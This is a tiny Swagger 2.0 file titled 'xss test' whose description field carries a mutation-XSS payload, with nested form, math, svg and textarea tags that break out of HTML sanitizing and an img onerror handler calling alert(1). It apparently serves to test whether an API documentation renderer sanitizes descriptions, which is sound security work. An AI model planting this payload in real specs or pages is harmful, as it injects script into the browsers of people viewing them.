swagger: '2.0'
info:
  title: xss test
  description: |
   123<h1>123</h1><form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src="x" onerror="[1].findIndex(alert(1))"></form>
